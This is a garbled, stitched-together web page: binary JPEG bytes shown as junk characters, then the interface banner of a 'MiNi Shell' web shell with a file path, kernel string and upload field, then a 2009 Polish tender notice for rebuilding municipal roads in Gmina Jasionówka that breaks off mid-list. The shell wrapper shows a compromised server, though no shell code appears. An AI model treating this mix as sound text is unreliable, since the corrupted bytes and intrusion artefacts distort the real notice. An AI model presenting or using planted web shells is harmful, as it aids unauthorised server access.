JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090312/59326-N-2009.html

<p class="kh_header"><b>Jasionówka: Integracja dróg i ulic gminnych z siecią dróg krajowych, wojewódzkich i powiatowych na terenie Gminy Jasionówka</b><br>
<b>Numer ogłoszenia: 59326 - 2009; data zamieszczenia: 12.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jasionówka , Rynek 19, 19-122 Jasionówka, woj. podlaskie, tel. 085 7160021, faks 085 7160025.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jasionowka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Integracja dróg i ulic gminnych z siecią dróg krajowych, wojewódzkich i powiatowych na terenie Gminy Jasionówka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Projekt realizowany będzie w 3 etapach i obejmuje: 
1) Etap I - budowę drogi gminnej Nr 104003B od drogi wojewódzkiej Nr 671 do miejscowości Kąty w km 0+000 - 2+552,05; - realizacja w roku 2009.
2) Etap II - przebudowę ulic gminnych w miejscowości Jasionówka - realizacja w roku 2010:
a) ulicy Kociej (nr 104010B) w km 0+000 - 0+233,
b) ulicy Młynowej (Nr 104007B) w km 0+000 - 0+238,
c) ulicy Nowej (Nr 1004009B) w km 0+000 - 0+232,
d) ulicy Szkolnej (Nr 104008B) w km 0+000 - 0+183;
3) Etap III - przebudowę drogi gminnej Nr 104006B od drogi krajowej S 8 do miejscowości Krasne Stare, odcinek I w km 0+000 - 0+700, odcinek II w km 0+000 - 0+510,5 - realizacja w roku 2010.

    ad. 1) Etap I - droga Nr 104003B od drogi wojewódzkiej Nr 671 - miejscowość Kąty
Rozpatrywany odcinek drogi przebiega przez zabudowane i zagospodarowane rolniczo tereny wsi Kąty i Kalinówka Królewska. Zaczyna się od krawędzi nawierzchni bitumicznej drogi wojewódzkiej Nr 671 odcinek Knyszyn - Korycin, zaś kończy się na skrzyżowaniu dróg gminnych. Ma długość 2.552,05 m. Na całym odcinku droga ma przekrój szlakowy. Posiada ona na odcinku w km 0+000 - 0+184 nawierzchnię brukową o szerokości 5,0 m, zaś na pozostałym odcinku w km 0+184 - 2+552,05 nawierzchnię gruntową o szerokości 4,0 - 5,0 m miejscowo utwardzoną żwirem. Szerokość korony drogi wynosi od 6,5 do 8,0 m przy szerokości pasa drogowego 9,0 m. Nawierzchnia drogi jest w bardzo złym stanie technicznym. Posiada deformacje w przekroju podłużnym i poprzecznym. Konstrukcja drogi w niektórych miejscach przebiega poniżej okolicznego terenu. 
    W ciągu drogi, pod jezdnią występują 4 przepusty rurowe O 60 i długości 10,0 m w km 0+416,50; 0+783,00; 1+389,50; 1+629,50 i bez murków czołowych, które wymagają oczyszczenia i remontu oraz na km 1+629,50 przepust wylewany łukowy O 110 i długości 5,70 m, również wymagający remontu. Odwodnienie drogi odbywa się metodą powierzchniowego spływu wód opadowych na okoliczne pola. 
   Wzdłuż drogi, poza pasem drogowym przebiega:
- napowietrzna linia energetyczna, 
- doziemne kable telefoniczne, na  odcinku w km 0+000 - 1+627 i 1+930 - 2+552,05,
- sieć wodociągowa W - 100.
Nie ma kolizji robót drogowych z w/w infrastrukturą techniczną.
W planowanej jezdni na odcinku  w km 1+627 - 1+930  położony jest kabel telekomunikacyjny, który należy przełożyć umieszczając go w pasie drogowym poza jezdnią. 
   Zaprojektowano następujące parametry drogi Nr 104003B:
- klasa techniczna drogi - L,
- obciążenie ruchem - KR1,
- prędkość projektowana - Vp = 30 km / h,
- nawierzchnia bitumiczna o szerokości 5,0 m - spadek poprzeczny jezdni 2,0 %,
- utwardzone pobocza o szerokości 2 x 0,75-1,00 m - spadek poprzeczny poboczy 6,0 %,
- długość - 2.552,05 m.
    Przekrój konstrukcyjny projektowanej jezdni zaprojektowano na podłożu G1 dla ruchu KR1:
- podbudowa żwirowa z kruszywa naturalnego stabilizowanego mechanicznie o - grubości warstwy 15 - 30 cm (planowane wykorzystanie istniejącej nawierzchni żwirowej),
- nawierzchnia: 
    - warstwa wiążąca z betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 4 cm,
    - warstwa ścieralna z betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 4 cm.
    Odwodnienie drogi odbywać się będzie poprzez spływ powierzchniowy na okoliczne tereny i warunki wodne nie zmienią się. Wyniesienie korony drogi ponad otaczający teren znacznie poprawi skuteczność odwodnienia. Ponadto planuje się wykonać remont istniejących przepustów wraz z pogłębieniem rowów na wlocie i wylocie oraz zaprojektowano nowy przepust rurowy przy drodze wojewódzkiej (w km 0+006,5).
Dodatkowo na drodze gminnej zaprojektowano wybudowanie wjazdu gospodarskiego na działkę nr 78/1 w km 1+806.

    ad 2) Etap II - ulice w miejscowości Jasionówka:
a) ulica Młynowa (droga gm. Nr 104007B) w km 0+000 - 0+238,0
Rozpatrywana droga przebiega przez tereny zabudowane. Zaczyna się od krawędzi nawierzchni bitumicznej ul Knyszyńskiej (drogi wojewódzkiej Nr 671), biegnie w stronę pól i kończy się na granicy działki Nr 145. Ma ona długość 238,00 m. Na odcinku w km 0+004 - 0+036 ma nawierzchnię brukową o szerokości 5,0 m, zaś na pozostałym odcinku w km 0+036 - 0+238 nawierzchnię gruntową o szerokości 4,0 - 5,0 m. Nawierzchnia drogi jest w bardzo złym stanie technicznym. Posiada deformacje w przekroju podłużnym i poprzecznym. Konstrukcja drogi w niektórych miejscach przebiega poniżej okolicznego terenu. 
    Odwodnienie drogi odbywa się metodą powierzchniowego spływu wód opadowych poza koronę drogi bez udziału rowów, przepustów czy kanalizacji deszczowej. Droga nie posiada chodników i poboczy.
Wzdłuż drogi przebiegają:
- słupy i kable linii energetycznej (oświetleniowej) poza pasem drogowym,
- słupy i kable i linii telekomunikacyjnej na granicy pasa i poza nim,
- hydrant i sieć wodociągowa po prawej stronie jezdni,
- kanał sanitarny Ks 200 w osi jezdni.
    Zaprojektowana ulica będzie miała następujące parametry:
- klasa techniczna ulicy - L
- obciążenie ruchem KR1,
- prędkość projektowana - Vp = 30 km / h,
- szerokość pasa drogowego 4,00 - 8,50 m,
- jezdnia o nawierzchni bitumicznej o szerokości 3,6; 4,0; 5,0 m - na odcinku w km 0+000 - 0+175 spadek poprzeczny jezdni 2,0 % daszkowy, od km 0+175 m jednospadkowy w lewo,
- nie przewiduje się wykonania poboczy oraz chodników,
- na docinku 0+003,83 - 0+045,55 zaprojektowano parking o szerokości 1,70 - 2,80 m i nawierzchni z kostki brukowej,
    Przekrój konstrukcyjny projektowanej jezdni zaprojektowano na podłożu G1 dla ruchu KR1:
1.na istniejącej nawierzchni brukowej:
- wyrównanie nawierzchni brukowej masą mineralno - bitumiczną (0 - 100 kg / m2)
- nawierzchnia z betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 5 cm,
- parking z kostki brukowej (grubość 8 cm) na podbudowie z kruszywa naturalnego - stabilizowanego mechanicznie o gr. 15 cm
2.   na istniejącej nawierzchni gruntowej:
- warstwa odcinająca z piasku w korycie o grubości 5 cm
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie w korycie o grubości warstwy 20 cm,
- nawierzchnia: 
    - warstwa wiążąca z betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 4 cm,
    - warstwa ścieralna betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 4 cm.
   Odwodnienie drogi pozostawia się jako powierzchniowe. Wyniesienie korony drogi ponad otaczający teren znacznie poprawi skuteczność odwodnienia. Ponadto planuje się wykonać remont istniejącej studni chłonnej na włączeniu do drogi wojewódzkiej Nr 671 wykonanej z kręgów betonowych D 180 cm i głębokości 4,0 m z podłączeniem czterech studzienek deszczowych z wpustami ulicznymi i osadnikami. W km 0+175 zaplanowano odwodnienie tymczasowe w postaci korytek z rusztem (typu faserfix) z odprowadzeniem rurą PCV o średnicy 200 mm i długości 8 m na teren niezabudowany.

b) ulica Szkolna (droga gm. Nr 104008B) w km 0+000 - 0+183,0
    Rozpatrywana droga przebiega przez tereny zabudowane. Zaczyna się od krawędzi nawierzchni bitumicznej ul Knyszyńskiej (drogi wojewódzkiej Nr 671) i kończy się na krawędzi nawierzchni bitumicznej ul. Białostockiej (droga powiatowa 03346 Jasionówka - Dobrzyniówka - trasa S 8). Ma ona długość 183,00 m. Na całym odcinku ma nawierzchnię brukową o szerokości 6,0 m. Po prawej stronie jezdni ułożony jest chodnik z płytek betonowych o szerokości 2,0 m. Pas drogowy ma szerokość 9,0 m. Nawierzchnia drogi jest w bardzo złym stanie technicznym. Posiada deformacje w przekroju podłużnym i poprzecznym. Odwodnienie drogi odbywa się metodą powierzchniowego spływu wód opadowych poza koronę drogi bez udziału rowów, przepustów czy kanalizacji deszczowej. 
    Wzdłuż drogi przebiegają:
- słupy linii energetycznej (oświetleniowej) w chodniku po prawej stronie jezdni,
- słupy i kable linii telekomunikacyjnej w chodniku po lewej stronie jezdni,
- hydrant i sieć wodociągowa W - 100 po lewej stronie jezdni
- kanał sanitarny Ks 200 w osi jezdni.
     Zaprojektowana ulica będzie miała następujące parametry:
- klasa techniczna ulicy - L
- obciążenie ruchem kat. KR1,
- prędkość projektowana - Vp = 30 km / h,
- szerokość pasa drogowego 9,0 m,
- jezdnia o nawierzchni bitumicznej o szerokości 6,0 m - spadek poprzeczny jezdni 2,0 % daszkowy, 
- chodniki po obu stronach jezdni o szerokości 0,75 - 1,50 - 2,00 m z kostki brukowej - spadek poprzeczny 2 %.
     Aby uzyskać odpowiednie spadki poprzeczne jezdni po lewej stronie jezdni należy rozebrać nawierzchnię brukową i wykorygować teren. Zaprojektowano przekrój konstrukcyjny normalny jezdni na podłożu G1 dla ruchu KR1:
1.przekrój normalny 2A (lewa strona jezdni)
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie w korycie o grubości warstwy 20 cm,
- nawierzchnia - beton asfaltowy o uziarnieniu 0/12,8 mm - grubość 5 cm,
- chodnik z kostki brukowej o grubości 6 cm na podsypce piaskowej o grubości 5 cm,
2. przekrój normalny 2B (prawa strona):
- wyrównanie nawierzchni brukowej masą mineralno - bitumiczną (0 - 150 kg / m2) - o grubości od 0 do 6 cm
- nawierzchnia z betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 5 cm,
- chodnik z kostki brukowej o grubości 6 cm na podsypce piaskowej o grubości 5 cm.
Ponadto na chodnikach po obu stronach jezdni zaprojektowano 14 wjazdów bramowych na posesje z kostki brukowej o grubości 8 cm na podsypce żwirowej grubości 15 cm.
    Odwodnienie drogi odbywać się będzie poprzez spływ powierzchniowy i nie zmienią się warunki wodne. 

c) ulica Nowa (droga gm. Nr 104009B) w km 0+000 - 0+232,0
    Rozpatrywana droga przebiega przez tereny zabudowane. Zaczyna się od krawędzi nawierzchni bitumicznej ul Knyszyńskiej (drogi wojewódzkiej Nr 671) i kończy się na krawędzi nawierzchni bitumicznej ul. Białostockiej (droga powiatowa 03346 Jasionówka - Dobrzyniówka - trasa S8). Ma ona długość 232,00 m. Na całym odcinku ma nawierzchnię bitumiczną o szerokości 6,0 m ułożoną na nawierzchni brukowej. Po obu stronach jezdni ułożony jest chodnik z płytek chodnikowych. Pas drogowy ma szerokość 9,0 m. Nawierzchnia drogi jest w bardzo złym stanie technicznym. Jest popękana i miejscami wykrusza się. Posiada deformacje w przekroju podłużnym i poprzecznym. Odwodnienie drogi odbywa się metodą powierzchniowego spływu wód opadowych poza koronę drogi bez udziału rowów czy kanalizacji deszczowej. Pod jezdnią znajdują się 2 przepusty (z wpustami) w km 0+131,5 i 0+200 w złym stanie technicznym, wymagające remontu.
     Wzdłuż drogi przebiega:
- słupy linii energetycznej (oświetleniowej) - w chodniku po lewej stronie jezdni,
- słupy i kable linii telekomunikacyjnej - w chodniku po prawej stronie jezdni,
- hydrant i sieć wodociągowa - w chodniku po lewej stronie jezdni i pod jezdnią,
- kanał sanitarny Ks 200 pod jezdnią.
    Zaprojektowana ulica będzie miała następujące parametry:
- klasa techniczna ulicy - L
- obciążenie ruchem kategorii KR1,
- prędkość projektowana - Vp = 30 km / h,
- szerokość pasa drogowego 9,0 - 10,0 m,
- jezdnia o nawierzchni bitumicznej o szerokości 6,0 m - spadek poprzeczny jezdni 2,0 % daszkowy, 
- chodniki po obu stronach jezdni o szerokości 1,50 - 2,00 m z kostki brukowej - spadek poprzeczny 2 %.
    Zaprojektowano przekrój konstrukcyjny jezdni na podłożu G1 dla ruchu  KR1:
- wyrównanie istniejącej nawierzchni brukowej masą mineralno - bitumiczną (0-150 kg/m2) o grubości od 0 do 6 cm,
- nawierzchnia z betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 5 cm,
- chodniki z kostki brukowej o grubości 6 cm na podsypce piaskowej o grubości 5 cm,
Nad przepustami zaplanowano warstwę wyrównawczą z masy asfaltowo - bitumicznej o grubości 10 cm. Ponadto na chodnikach po obu stronach jezdni zaprojektowano 12 wjazdów na posesje.
    Odwodnienie drogi odbywać się będzie poprzez spływ powierzchniowy i nie zmienią się warunki wodne. Istniejące przepusty należy wyremontować oraz zamontować wpusty żeliwne po obu stronach jezdni.

d) ulica Kocia (droga gm. Nr 104010B) w km 0+000 - 0+233,0
Rozpatrywana droga przebiega przez tereny zabudowane. Zaczyna się od krawędzi nawierzchni bitumicznej ul Knyszyńskiej (drogi wojewódzkiej Nr 671), przebiega w stronę pól i kończy się na granicy działki Nr 176/4. Ma ona długość 233,00 m. Na odcinku w km 0+006 - 0+036 ma nawierzchnię brukową o szerokości 5,50 m, a na pozostałym odcinku nawierzchnię kamienisto - piaskową o szerokości 4,50 - 5,50 m. Nie ma chodników. Pas drogowy ma szerokość 4,50 - 10,50 m. Nawierzchnia drogi jest w bardzo złym stanie technicznym. Posiada deformacje w przekroju podłużnym i poprzecznym. Konstrukcja drogi w niektórych miejscach przebiega poniżej okolicznego terenu. 
    Odwodnienie drogi odbywa się metodą powierzchniowego spływu wód opadowych poza koronę drogi bez udziału rowów, przepustów czy kanalizacji deszczowej. 
    Wzdłuż drogi przebiega:
- słupy i kable linii energetycznej (oświetleniowej) - poza pasem drogowym,
- słupy i kable linii telekomunikacyjnej - na krawędzi jezdni oraz na granicy pasa drogowego,
- hydrant i sieć wodociągowa - brak, 
- kanał sanitarny Ks 200 - w osi jezdni.
    Zaprojektowana ulica będzie miała następujące parametry:
- klasa techniczna ulicy - L
- obciążenie ruchem kategorii KR1,
- prędkość projektowana - Vp = 30 km / h,
- szerokość pasa drogowego 4,50 - 10,50 m,
- jezdnia o nawierzchni bitumicznej o zmiennej szerokości 5,50; 4,00; 5,0 m - spadek poprzeczny jezdni 2,0 % daszkowy, 
- chodnik po lewej stronie jezdni od ul. Knyszyńskiej o długości 35,89 m i szerokości 2,00 m z kostki brukowej - spadek poprzeczny 2 %,
- na łuku i odcinku drogi w km 0+157,0 - 0+233 zaprojektowano po obu stronach jezdni pobocza żwirowe o szerokości 1,0 m - spadek poprzeczny 6 %.
    Zaprojektowano przekrój konstrukcyjny jezdni na podłożu G1 dla ruchu KR1:
1.przekrój normalny 2.1
- wyrównanie istniejącej nawierzchni brukowej masą mineralno - bitumiczną (0-100 kg/m2) o grubości od 0 - 4 cm,
- nawierzchnia z betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 5 cm,
- chodnik z kostki brukowej o grubości 6 cm na podbudowie z piasku o grubości 10 cm,
2.przekrój normalny 2.2:
- warstwa odcinająca z piasku w korycie o grubości 5 cm,
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie w korycie o grubości warstwy 20 cm,
- warstwa wiążąca z betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 4 cm,
- warstwa ścieralna z betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 4 cm,
    Odwodnienie drogi pozostawia się jako powierzchniowe. Wyniesienie korony drogi ponad otaczający teren znacznie poprawi skuteczność odwodnienia. Ponadto planuje się wykonać remont istniejącej studni chłonnej na włączeniu do drogi wojewódzkiej Nr 671 wykonanej z kręgów betonowych D 180 cm i głębokości 4,0 m z podłączeniem czterech studzienek deszczowych z wpustem ulicznym i osadnikiem, przykanaliki z rur PCV. W km 0+157 zaplanowano odwodnienie tymczasowe w postaci korytek z rusztem (typu faserfix) z odprowadzeniem rurą PCV o średnicy 200 mm i długości 8 m na teren niezabudowany.

ad 3) Etap III - droga Nr 104006B od drogi krajowej S8 do miejscowości Krasne Stare odcinek I w km 0+000 - 0+700, odcinek II w km 0+000 - 0+510,5
    Rozpatrywana droga przebiega od drogi krajowej S 8 odc. Białystok - Korycin, po gruntach wsi Krasne Stare, jako droga wewnątrz zabudowań. Na całej długości drogi występuje zabudowa mieszkaniowa lub tereny zagospodarowane rolniczo. Na odcinku I ma ona nawierzchnię żwirowo - gruntową w km 0+007 - 0+308,5 i na odcinku w km 0+308,3 - 0+685,5 nawierzchnię brukową o szerokości 3,5 - 4,0 m, a dalej do km 0+700 nawierzchnię gruntową o szerokości 4,0 m. Odcinek II na całej długości ma nawierzchnię gruntową. 
    Nawierzchnia drogi jest w bardzo złym stanie technicznym. Posiada deformacje w przekroju podłużnym i poprzecznym. W ciągu drogi, pod jezdnią występują 3 przepusty:
- w km 0+372,2 (odc. I)  skrzynkowy, całkowicie zasypany,
- w km 0+425,0 (odc. I) skrzynkowy, całkowicie zasypany,
- w km 0+202,0 (odc. II) rurowy O 40 i długości 6,0 m, całkowicie zasypany.
Odwodnienie drogi odbywa się metodą powierzchniowego spływu wód opadowych poza koronę drogi bez udziału rowów, przepustów i kanalizacji deszczowej.
    Wzdłuż drogi, poza pasem drogowym przebiega:
- napowietrzna linia energetyczna, 
- doziemne kable telefoniczne,
- sieć wodociągowa.
    Zaprojektowano następujące parametry drogi Nr 104006B:
- klasa techniczna drogi - L,
- obciążenie ruchem - KR1,
- prędkość projektowana - Vp = 40 km / h,
3) nawierzchnia bitumiczna o szerokości od 3,5 - 5,0 m - spadek poprzeczny jezdni 2,0 % daszkowy
4) utwardzone pobocza o szerokości 2 x 0, 5 -1,0 m - spadek poprzeczny poboczy 6,0 %,
5) długość - 1 210,5 m.
Obecnie wykonywana jest przez Generalną Dyrekcję Dróg Krajowych i Autostrad dokumentacja techniczna na przebudowę drogi krajowej S8 na odcinku Katrynka i Korycin. Odcinki drogi: I w km 0+007 - 0+171 oraz II w km 0+441,5 - 0+510,5 znajdą się w pasie projektowanej drogi i będą one przebudowane w trakcie przebudowy drogi S8. Dlatego też na tych odcinkach zaprojektowano jezdnię tymczasową - na istniejącej nawierzchni zostanie ułożona jezdnia z kruszywa i emulsji asfaltowej.
    Układ i grubość warstw w przekroju konstrukcyjnym jezdni drogi gminnej zaprojektowano następująco: 
1) na odcinku I w km 0+007 - 0+171 szerokość jezdni wynosi 5,0 m i poboczy 1,0 m oraz na docinku II w km 0+441,5 - 0+510,5 szerokość jezdni wynosi 4,0 m i poboczy 1,0 m - zaprojektowano jezdnię tymczasową na podbudowie z kruszywa naturalnego stabilizowanego mechanicznie o grubości warstwy 30 cm zaprojektowano 4 warstwowe powierzchniowe utrwalenie emulsją asfaltową średnio rozpadową i kruszywem frakcji 16/31,5; 6,3/12,8;  2/6,3; 0/4 mm,
2) na odcinku I w km 0+171 - 0+308,5 szerokość jezdni wynosi 5,0 m i poboczy 1,0 m, na odcinku I w km 0+685,5 - 0+700 szerokość jezdni wynosi 3,5 m i poboczy 0,5 - 1,0 m, na odcinku II w km 0+000 - 0+441,5 szerokość jezdni wynosi 4,0 m i poboczy 1,0 m zaprojektowano nawierzchnię jezdni w krawężniku złożoną z: 
    - podbudowy z kruszywa naturalnego stabilizowanego mechanicznie o grubości 20 cm,
    - warstwy wiążącej z betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 4 cm,
    - warstwy ścieralnej z  betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 4 cm,
3) na odcinku I w km 0+308,5 - 0+602 szerokość jezdni wynosi 5,0 m i poboczy 1,0 m, na odcinku I w km 0+602 - 0+685,5 szerokość jezdni wynosi 3,5 m i poboczy 1,0 m, zaprojektowano nawierzchnię jezdni w opornikach betonowych 20 x 15 cm na ławie betonowej złożoną z: 
    - istniejącej nawierzchni brukowcowej,
    - podbudowy z kruszywa naturalnego stabilizowanego mechanicznie o grubości 20 cm,
    - wyrównanie nawierzchni brukowej masą mineralno - bitumiczną (0-150 kg/ m2),
    - warstwy ścieralna betonu asfaltowego o uziarnieniu 0/12,8 mm - grubość 4 cm.
Odwodnienie drogi odbywać się będzie poprzez spływ powierzchniowy. Nie zmienią się warunki wodne. Wyniesienie korony drogi ponad otaczający teren znacznie poprawi skuteczność odwodnienia. Ponadto planuje się wykonać remont istniejących przepustów skrzynkowych z zamontowaniem studzienek wpustowych oraz przepustu rurowego. Na odcinku II w km 0+140 - 0+315 będą pogłębione rowy przydrożne..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.20-7, 45.23.21.30-2, 45.23.23.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O  zamówienie mogą ubiegać się Wykonawcy, którzy:
1) spełnią warunki określone w art. 22 ust 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r., Nr 223, poz. 1655 ze zm.)
2) nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust 1 i 2 ustaw z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r., Nr 223, poz. 1655 ze zm.)
3) spełnią wymogi specyfikacji istotnych warunków zamówienia.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o dokumenty wymagane w rozdziale VII niniejszej SIWZ metodą spełnia/nie spełnia z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Na ofertę składają się następujące dokumenty i załączniki:
1) Formularz ofertowy - wypełniony i podpisany przez Wykonawcę wraz z załącznikami, (Zał. Nr 1);
2) Kosztorys ofertowy - wypełniony i podpisany przez Wykonawcę;
3) Harmonogram rzeczowo - finansowy (Zał. Nr 3).

2. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności  lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawo zamówień publicznych składa następujące oświadczenia i dokumenty:
